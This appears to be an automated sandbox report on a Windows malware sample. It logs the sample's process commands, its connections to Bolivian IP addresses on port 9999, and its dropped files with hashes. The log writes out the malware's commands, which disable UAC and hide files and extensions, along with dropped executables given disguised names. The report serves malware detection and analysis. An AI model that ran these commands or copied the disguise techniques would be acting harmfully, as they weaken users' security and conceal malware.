reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\aQEIoEYo.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-136769349997536416264543926117786159727187928611249733029-1033060719-2144830181"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\wSIwswIA.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\gUwcgUMQ.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\zyAYMkMI.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "117920964420539522718499216341650678781-19937889751720336510-884698817-1853840851"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\zuoYsAcA.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "988707844415915722-609243999-327066083-1665363118-1192982968-1999682685167566459"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-16644747351746314424-8060752141473244612-698105996-428804660-2799125271062821770"

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\hcQQYoUY.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-11050572231544981268759397333-373549152-2004014128931458152-991365174-455273832"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1693863997-620914136-173626340-1244531357-20631061491070059639310689854370032224"

Network

Country Destination Domain Proto
BO 200.87.164.69:9999 tcp
US 8.8.8.8:53 google.com udp
GB 172.217.16.238:80 google.com tcp
BO 200.87.164.69:9999 tcp
GB 172.217.16.238:80 google.com tcp
BO 200.119.204.12:9999 tcp
BO 200.119.204.12:9999 tcp
BO 190.186.45.170:9999 tcp
BO 190.186.45.170:9999 tcp

Files

memory/2128-0-0x0000000000400000-0x000000000041F000-memory.dmp

\Users\Admin\PuoQwQAo\hqEcIcQw.exe

MD5 9d27902d496067ee6b9e3105a52dc074
SHA1 c734f2933ccce8e78bfeb6b35e3b2f42ce46e7e5
SHA256 c872bd9727746f3fac21cc446a6dd863671d72e44dea4f1cf0d3a3f862d9b4a5
SHA512 f14b74d0235a1e7dd7f0afe5431f64c04ac6572c28516041358535c9c2eb0106fa8fc7ad50c20ae11031d2de9d2e58a7a82524ac12cfa8358e1e061904f739cf

memory/2128-4-0x00000000004B0000-0x00000000004CD000-memory.dmp

memory/2128-10-0x00000000004B0000-0x00000000004CD000-memory.dmp

\ProgramData\LOAkMAgs\fAMIYEgY.exe

MD5 6ece8d0530a944a5ed673170a3ea3f46
SHA1 82baa6fc700423865f0e251719f043dd6ca78ff6
SHA256 0bd73fb3682d5a33bb9252d2ce21ff65fe040ec97fb2caba8c931fbfb04ad101
SHA512 1d43d6b9261220e33dbaf01b5eddaa40d3b72d1a59ca1d235c81703afaec7345092596ab204db1063da93a82b4a67b36566343a95a0a944b6665c8b99702344b

memory/2808-30-0x0000000000400000-0x000000000041C000-memory.dmp

memory/2128-28-0x00000000004B0000-0x00000000004CC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\BEkooIwM.bat

MD5 f6275d2994af7d7605c32416ebcc010e
SHA1 521c3f882de72c35453f0465bdddc152753c716f
SHA256 d5cbf64a010b4e969e7f198dac87400f3f5d316e313859a3e925feee7e7320be
SHA512 8d80830e7c6baab05b0a421a6eda5a990c3426e743c027f1b02351e5e6463720b96fe31f50aad9d04c2e67d5fd6a63271dcf42a8be3244820774a186d6bd0673

memory/1708-31-0x0000000000120000-0x000000000013F000-memory.dmp

memory/2872-32-0x0000000000400000-0x000000000041F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\NkkkYksA.bat

MD5 bae1095f340720d965898063fede1273
SHA1 455d8a81818a7e82b1490c949b32fa7ff98d5210
SHA256 ee5e0a414167c2aca961a616274767c4295659517a814d1428248bd53c6e829a
SHA512 4e73a24161114844d0e42c44c73205c4a57fa4169bd16c95fb7e9d6d5fcdf8bd01741541c77570556ac1f5ee260da67a9041f40381b6c6e0601c9de385bdc024

memory/2128-41-0x0000000000400000-0x000000000041F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\file.vbs

MD5 4afb5c4527091738faf9cd4addf9d34e
SHA1 170ba9d866894c1b109b62649b1893eb90350459
SHA256 59d889a2bf392f4b117340832b4c73425a7fb1de6c2f83a1aaa779d477c7c6cc
SHA512 16d386d9ece30b459fd47ca87da1f67b38d52a8e55f8fd063762cb3b46ae2c10bc6eac7359b0d1ef4c31c1ac8748ae8f62f8816eff0691abdd3304df38e979a5

C:\Users\Admin\AppData\Local\Temp\XCsAwogw.bat

MD5 f81a7aa19536898983814e68b8858afc
SHA1 579ea97311bf014d90e38fbd87ad1cc807160882
SHA256 0c8f89a1bbe8e4a637f714293db362eef4cef5b7611702d8cd1744dc4d01ad1f
SHA512 8b004bb6167eabfc04a72f9e97a2507248ac276180636f32ea2432e3e7fcc7627a9fe5bc48d40f4498cada44ecbaee6dd56c612349c6f765516a37a132fc0378

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

MD5 62eb5f8af13f0886f278614f5f43e21f
SHA1 7a0387dc6c5f9c31c18196fb860dd50a7a3e9c71
SHA256 ec3e84ad90487122ba0eba5945de8a2ca2b10ffc16b3a02746def24e926148b4
SHA512 7c5008c846420519589a99f04d6e5421f895c18cba00d3ae43cefadc594b185dfce5d21942cc67d0ab0e0666b6bab497e368ceeea87db8c35bcee8342d827c80

memory/2116-54-0x0000000000400000-0x000000000041F000-memory.dmp

memory/2872-63-0x0000000000400000-0x000000000041F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\XggQMYQs.bat

MD5 0afbd30cd357f3748fb470555519300e
SHA1 397d2182065583ef08d827ee6426aec8868f25c5
SHA256 6afddc20ea00eaac511e7682646b50ffd74f2b09e7f75ff1117d804e248acd80
SHA512 3ab20c43cc211deb50fd6be218684f50b16ed84608cf39ff2d4ca112b1dab9a7c29a45316634753d64f4bf444eacbfd94e5f76058b921e7bec52941ba00bb420

memory/3056-78-0x0000000000400000-0x000000000041F000-memory.dmp

memory/2304-77-0x00000000000B0000-0x00000000000CF000-memory.dmp

memory/2304-76-0x00000000000B0000-0x00000000000CF000-memory.dmp

memory/2052-87-0x0000000000400000-0x000000000041F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\QwgMIQgI.bat

MD5 ca3c9e8e03900e8a69c89a377f8dbd21
SHA1 017653e81256b64f7423b2d72f42a2d0c93d7a70
SHA256 b29d549ecb3eca922b4c43310c3f932d4fc89ce9fa31edc17e25b9a11d1f58f4
SHA512 efc709e7053530e22f67cbf3a4eadb903f00bc2b1929774efb5ae89be9f8c6a3677960f5b43493a153c334d96887caf39b0502ee03ffd6d260239456c7898655

memory/824-102-0x0000000000400000-0x000000000041F000-memory.dmp

memory/1048-101-0x0000000000400000-0x000000000041F000-memory.dmp

memory/1048-100-0x0000000000400000-0x000000000041F000-memory.dmp

memory/3056-111-0x0000000000400000-0x000000000041F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\oAcIUcQg.bat

MD5 82c6b867d0e2433fee177647f277f4b1
SHA1 07d438c2bb87158b853606bc592e39269591e3af
SHA256 1ff5f455dd615fd1adfac27b756936c3d4ff59aee7087a98f3fa7ef3a43eb237
SHA512 e3118072a76449398a4fc689472962948d0544adeea084a48ee6b8eb61ca035c871704c1d1df077c4105fca477f7d8cdb5c5847ac85aeb3e6b76e466f533cd90

memory/1180-124-0x0000000000400000-0x000000000041F000-memory.dmp

memory/1180-125-0x0000000000400000-0x000000000041F000-memory.dmp

memory/1260-126-0x0000000000400000-0x000000000041F000-memory.dmp

memory/824-135-0x0000000000400000-0x000000000041F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\csgMMkoI.bat

MD5 c513daee3c16406f81bef256d906a9b1
SHA1 06f192ff47031a4f667a3d2ffda7444bde6179fe
SHA256 1089755ae8e03e55fabe6b619e2beec52a2a634748bef7dc771f0c69345865de
SHA512 caa79eb7abdb536749eb50881ec8cd1335321ae5399d32ac6284a7a897c8615d087844a3df6da1879cbe93d7c01df3831cae0a4935599a8587c359455ee881fb

memory/2024-150-0x0000000000400000-0x000000000041F000-memory.dmp

memory/872-149-0x00000000000F0000-0x000000000010F000-memory.dmp

memory/872-148-0x00000000000F0000-0x000000000010F000-memory.dmp

memory/1260-159-0x0000000000400000-0x000000000041F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\occkkQQQ.bat

MD5 cebbb9c34ae1f7b361e121d041d8f7ed
SHA1 d21065864305b6159d89536944fa6d0d9d41a4a2
SHA256 41df081045549bb8dfe3733a4c50944715e47b20727d0a5dfd16cafd238e9703
SHA512 292761e5c80c543f1a01b9911b5b14c97958865e1d3c1561ee3aac2e2b0e1ef1d6a2236164efb223efe3554762d56d57cca02c162073aace2440d38c7ce0759b

memory/2580-173-0x0000000000260000-0x000000000027F000-memory.dmp

memory/1976-174-0x0000000000400000-0x000000000041F000-memory.dmp

memory/2580-172-0x0000000000260000-0x000000000027F000-memory.dmp

memory/2024-183-0x0000000000400000-0x000000000041F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\QgYIooUU.bat

MD5 e24674676548ff57a8ce206d52746744
SHA1 b3ca672932f5943f98e3f4453a14d2fa0e0e8cf6
SHA256 c2e964e13c570a2079f608b642a4e90b355fcc594b99f0ce93fda4df5c7cdbce
SHA512 9d7393ad73cc899858deb5528f718d6f1cc37958c3d184ce2cd2178e2813d72e6b661b91ad76d44a532f47d10ac3182400683ba59d52cc74edb239da69cfeb40

memory/2968-196-0x0000000000400000-0x000000000041F000-memory.dmp

memory/2700-197-0x0000000000400000-0x000000000041F000-memory.dmp

memory/1976-206-0x0000000000400000-0x000000000041F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\LQkIkscA.bat

MD5 44839e68a38477c6f3ce0f2462223b1e
SHA1 c7d791af31215ae3614652a6111bcd30a1c6a1cc
SHA256 b873987199fa2b665849ca85ad5c6c1a93d3a34f62848c3a97ae92d2754af855
SHA512 fcee7d9d75e359add104bc06002fbb484b2aeef81a833ded029c256efd1b730a3a98ca879a34d84f5ba8dad2f11916832d48a5f1ba55ad8611dc522ef627bae6

memory/2184-218-0x0000000000170000-0x000000000018F000-memory.dmp

memory/568-219-0x0000000000400000-0x000000000041F000-memory.dmp

memory/2700-229-0x0000000000400000-0x000000000041F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\hOUosoYQ.bat

MD5 0e4312d20996355c8144df1781fdef7d
SHA1 2c3ba774f0384f0ccabf3b43108d57bfab013aae
SHA256 eb9b4a029fbea09f8033176958942cf690a3e2ea6cccb5b9eeaa7395f95b0f3c
SHA512 c245b84ad62dce5af126514fb795aac9740b760f98a348af6aa11968c48d76c978296a94831e9930e2a95e70c1615870155c2951c161728b8e4bcced35424093

memory/568-252-0x0000000000400000-0x000000000041F000-memory.dmp

memory/3068-244-0x0000000000400000-0x000000000041F000-memory.dmp

memory/664-243-0x0000000000120000-0x000000000013F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xKQcIAks.bat

MD5 244567c5becf5d1da8a16d558b56d56c
SHA1 f0148545ba5a4e01c0082373798fd972d3e54cb1
SHA256 3f861819fc5616beb6f40b5f3839abb0c6c7249d43eb91ae08c09c0e524452cc
SHA512 21b16b9f022d0ce4b47169238ea0fff8ca28c37348a40251e575186b97a0a30ed9bda8a813b63bda727b6b535b2ed8b732bb39cb9f93cf3c3c8f51bc2bb39369

memory/3068-273-0x0000000000400000-0x000000000041F000-memory.dmp

memory/1728-274-0x0000000000130000-0x000000000014F000-memory.dmp

memory/1728-275-0x0000000000130000-0x000000000014F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\vuYUscsg.bat

MD5 44eef243ad0f610dcf91e470e8fbd8c4
SHA1 feaf3988bf4bd98a6ef0d2890407dc0a2ed49833
SHA256 1ef1cdd7dbf199d6eb1b815015f108637695bb4a9d76dd521956eaa49e22dd43
SHA512 ae07c0b960574b76138d24796e034025201ddc6287f5003d339372e7278c8231ddc27eac1a4105f77af9a9a50bc5ce45da3cd7bed22e691f988725df0d2a5bbd

memory/2444-296-0x0000000000400000-0x000000000041F000-memory.dmp

memory/2584-298-0x0000000000400000-0x000000000041F000-memory.dmp

memory/1808-297-0x0000000000170000-0x000000000018F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\SewwIcMI.bat

MD5 c349728ce3d216923431a0301ba6c429
SHA1 b1292d3ef0e15b6ffffd8541793dfe608f3a3832
SHA256 71d4dc5754d83118540a52c72336489a66e9631f8f2c33282a187472e14dc9f0
SHA512 cc3ea865f54e9b11cc9883e53a89ec7f7fe3608a1f75de54780981e29f376ba835b8836a034ca8048a2bd081595120453c945531624d7e97a8f1d855e6ac57a6

memory/2312-312-0x0000000000160000-0x000000000017F000-memory.dmp

memory/2584-321-0x0000000000400000-0x000000000041F000-memory.dmp

memory/2312-313-0x0000000000160000-0x000000000017F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\CaoAsYUU.bat

MD5 2344d0fa538eff98ea5a92384b2c0b80
SHA1 0d4d883778a59a606dc0b77fa546cb4661fe7769
SHA256 d9bd2f8c46f5d46507173f7c9d1298484e8155cb0b63c7877769736a75ddaaa5
SHA512 10e63b30bf12f8273510c50777b6891338cba67d987b20ee9003968f1ee050e710c587afc2cf62bff90dcb1cf60878f035915fe9ec72ca1437ca966b0c44a2f6

memory/2636-336-0x0000000000400000-0x000000000041F000-memory.dmp

memory/660-335-0x0000000000400000-0x000000000041F000-memory.dmp

memory/660-334-0x0000000000400000-0x000000000041F000-memory.dmp

memory/376-345-0x0000000000400000-0x000000000041F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\eWocAAsU.bat

MD5 e32cfcffa4a852c5af5dab492d5c9f98
SHA1 e549ecd871eed85cb005ac83740e161915beddcc
SHA256 a35c5e7f10480380f3f36672845ed2a487c7bd49e3f0fa1b6cdb1468fcdff350
SHA512 364f93fe94c3293268de8ffe79571885f77b18633f43c7a2426dfb59bba33ae50ebb0b78bb887d71c260a955a9db02b7290e123f86de80f72dccae9ca878c849

memory/1868-358-0x0000000000120000-0x000000000013F000-memory.dmp

memory/1952-360-0x0000000000400000-0x000000000041F000-memory.dmp

memory/2636-368-0x0000000000400000-0x000000000041F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\HWAAgQUE.bat

MD5 632ff675ce075186218de498c6616424
SHA1 ad796de5ad7e018f94c1b0ff1d7b58b367b554b0
SHA256 b7f914f39d37b6bce1ee48db31ffe2084dde36f86695f9c70c5634e99658947e
SHA512 c32f6648267fce37dae83caed2db555292658d7b74c82ecb1d78819ea0278ca890f05f47acd664f9ad3e59c6e05facc80ca46a6fa6863dc79a292161f63c6087

memory/1952-389-0x0000000000400000-0x000000000041F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\pkIcUAss.bat

MD5 2342f5198e639ecf76e485d5da444514
SHA1 4890988977ff91ff2d6648aac2dfbfbbdc1e04a6
SHA256 000a1ebd4377748cecebfa113fd459b2ed13793f5c7644c596a438bdd4398896
SHA512 806bcbf67d6cfe86fb1cf325a7f0baf71f1c82c7def2d46bc2125066681bfd989f646cc870879bafaebc0d17b0791186b7fb991d72adb616c442c4f62ead861b

memory/556-402-0x0000000000160000-0x000000000017F000-memory.dmp

memory/2296-411-0x0000000000400000-0x000000000041F000-memory.dmp

\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\ose.exe

MD5 9d10f99a6712e28f8acd5641e3a7ea6b
SHA1 835e982347db919a681ba12f3891f62152e50f0d
SHA256 70964a0ed9011ea94044e15fa77edd9cf535cc79ed8e03a3721ff007e69595cc
SHA512 2141ee5c07aa3e038360013e3f40969e248bed05022d161b992df61f21934c5574ed9d3094ffd5245f5afd84815b24f80bda30055cf4d374f9c6254e842f6bd5

\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\setup.exe

MD5 4d92f518527353c0db88a70fddcfd390
SHA1 c4baffc19e7d1f0e0ebf73bab86a491c1d152f98
SHA256 97e6f3fc1a9163f10b6502509d55bf75ee893967fb35f318954797e8ab4d4d9c
SHA512 05a8136ccc45ef73cd5c70ee0ef204d9d2b48b950e938494b6d1a61dfba37527c9600382321d1c031dc74e4cf3e16f001ae0f8cd64d76d765f5509ce8dc76452

C:\Users\Admin\AppData\Local\Temp\nqsYscgw.bat

MD5 d6d3e39a0a40d108cfd3378985325ef2
SHA1 25db6925e014f10be9cd265e9a2fc19eb3435069
SHA256 49e08be9c2e2c986ed34591e618a0a1068e78ed1ec67eadb36096e78075b976e
SHA512 94e0e0b02e66ae2862372d8a07d28bba7e417cc02879037d51db0a7cf95448dc2edc767bcd68ab37436559cfc2ea8658046058ea062f7db4824de9c87d3904a8

C:\Users\Admin\AppData\Local\Temp\YcgS.exe

MD5 1588b0a1179d6ffd97bb0fcfa2882600
SHA1 262acebb9765c02fcbffff935fb3eb89b9549604
SHA256 c820bedae1ad96e7e3e99040345c01d493958994e9828797316a2ff112e97a37
SHA512 2d0af8b71236d27b5cd711dd04f81fcbb8f0fcab12e1f6016477858d303f20fb4dbafe6af9d0a0ba879f55484b673078b1f9133f4aed76e7c67b5eed75da25cb

memory/2276-449-0x0000000000400000-0x000000000041F000-memory.dmp

\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\dwtrig20.exe

MD5 c87e561258f2f8650cef999bf643a731
SHA1 2c64b901284908e8ed59cf9c912f17d45b05e0af
SHA256 a1dfa6639bef3cb4e41175c43730d46a51393942ead826337ca9541ac210c67b
SHA512 dea4833aa712c5823f800f5f5a2adcf241c1b2b6747872f540f5ff9da6795c4ddb73db0912593337083c7c67b91e9eaf1b3d39a34b99980fd5904ba3d7d62f6c

memory/1724-455-0x0000000000400000-0x000000000041F000-memory.dmp

memory/3008-454-0x0000000000260000-0x000000000027F000-memory.dmp

memory/3008-452-0x0000000000260000-0x000000000027F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\OYMY.exe

MD5 511f229b58e452ee14646d97e05814ad
SHA1 047b4d5c03f871b1c72d51cfe29b3fe940d5a34a
SHA256 340a4c01a63acbd78657e2b37bad1251bfa176eac8a51a1b3b7b1eceb10177c3
SHA512 527759c3500cc4fa32cffd7216fad2f1ba5737f7441bde076f92cba7037dd4dadd53fe7a7303e5f71ca94ab38499cf4aaa69bec96e5734328e6d29598c79c4bd

C:\Users\Admin\AppData\Local\Temp\FOoYQksw.bat

MD5 46d2d8e77611ca4684e401c5198ba2a2
SHA1 e893205d88c71a6c9e5a19767381915196192ad3
SHA256 6d5c8c4318815d34463b6a6a6ea6fd11bb53c8c9f69550cc9d70af98d66be364
SHA512 d6687fd690d07c885125de2028e11cf13530a09c0c7c29f6e3c4e8995fd90c0e5d52a4ca18c1c21960b8918934ff97381c7cc61b0b177bba53b025323cff0975

C:\Users\Admin\AppData\Local\Temp\Wwok.exe

MD5 28d07f574274eaec1d8ba6aa1b3e061d
SHA1 110c82c031426c8a092630e68408b90363dc1a87
SHA256 59fc09b983656d4e43b778380a80f2d34b837faa1ebc6d3fa06cf83d34c05fff
SHA512 e2613672487417a36516b825a92a882ddc30dde84d18f9bee39caf863f73bff84ecadeba260194e61587618f4ee4cf52dab4b4238153b40f5b28c775001b8a22

memory/2544-494-0x0000000000400000-0x000000000041F000-memory.dmp

memory/2076-493-0x00000000002E0000-0x00000000002FF000-memory.dmp

memory/2076-492-0x00000000002E0000-0x00000000002FF000-memory.dmp

memory/1724-516-0x0000000000400000-0x000000000041F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\cMUk.exe

MD5 da350c39b5aba16a83d1f03e10e570d1
SHA1 20561e80b17e0700ce40e578d2057807d3878a0b
SHA256 e0c48b2f0ea4d6e0ef818a3337b8672dc495a98cba31194771523bf90e50ff62
SHA512 4351e4cbc90f2dee9b03cf7d0ca459f931038ef1293bc810e3c0ae343c0c1c76d672b24544d54ad575e4551c3404d704a66366c71c7894c9a2f597830f22de0e

C:\Users\Admin\AppData\Local\Temp\msEG.ico

MD5 47a169535b738bd50344df196735e258
SHA1 23b4c8041b83f0374554191d543fdce6890f4723
SHA256 ad3e74be9334aa840107622f2cb1020a805f00143d9fef41bc6fa21ac8602eaf
SHA512 ca3038a82fda005a44ca22469801925ea1b75ef7229017844960c94f9169195f0db640e4d2c382e3d1c14a1cea9b6cc594ff09bd8da14fc30303a0e8588b52a7

C:\Users\Admin\AppData\Local\Temp\qcgE.exe

MD5 e0f4917005819e794d294fde7a773a52
SHA1 d1d9c701b3f92aefffd23ffddee126348bd84499
SHA256 b1dadc809d11ad9462c48350f023520e7cde12268c09d56baf3d4ec7d9f3949d
SHA512 1e4872d75af6771f0feeadcc7367208ff788a938a899bdd155d81f02cc74a657602bb40a684df19976857396e3d2e24c3218870b429a3e60e992938c5d209b7a

C:\Users\Admin\AppData\Local\Temp\gAQK.exe

MD5 ea6010b4256546cc175b3ace77681e5f
SHA1 a752974bca53519083cb19a3d54b87d0703dd8e5
SHA256 ee1981231ea98c21944137085a084e3979a97b48ec7a8156f18e21d80a4a0212
SHA512 3ad02194c127f943da6af71339a8cc904cab7d536419a89d63dbde69f7beae1a9d8ffddaae7461fcfcd3cf5e039e307729e8ce75c94007e89dfd71dedcc21202

C:\Users\Admin\AppData\Local\Temp\oUcM.exe

MD5 e640212bc30c2522054acad1ffc4ec58
SHA1 c488a809291c820772a4d14c5446d2487e36d675
SHA256 b015c93c5a03bcfa3b932fb4aca154a8f95eb58a598dd484e6f81d2d6b2d7912
SHA512 382f92068d900ea012422b160ce5b9ecd3e496c231519cba0cac6b02441df4ac3307ba8e15fbae737b1b76ccf4880eb322e75764b8a9c1c596b3861daa900ab5

C:\Users\Admin\AppData\Local\Temp\YSAMgQok.bat

MD5 38c3a5f0fbe4025a52b2574aaa347618
SHA1 dc5cb97293069b817083a0c2ccc7428bbae99999
SHA256 0d2c2173e49fe8e7721bef798ee54c17e286a2fcd5e99b5805fdfec3397a2a93
SHA512 52adb61dc05c21bf2fe8dbfa2f50c5afd6bb6f3d539bfaf6637ee4cc2c4bd0e4204c5e1d872046daa0f7b1fa9c55adb0767e1241dd8e0beeb61feecc14f8df03

C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile10.bmp.exe

MD5 3f5eeddad135797e9063c85aedfb8d10
SHA1 f377b6d60b4a638def6a1dde307ecf17b31b21d3
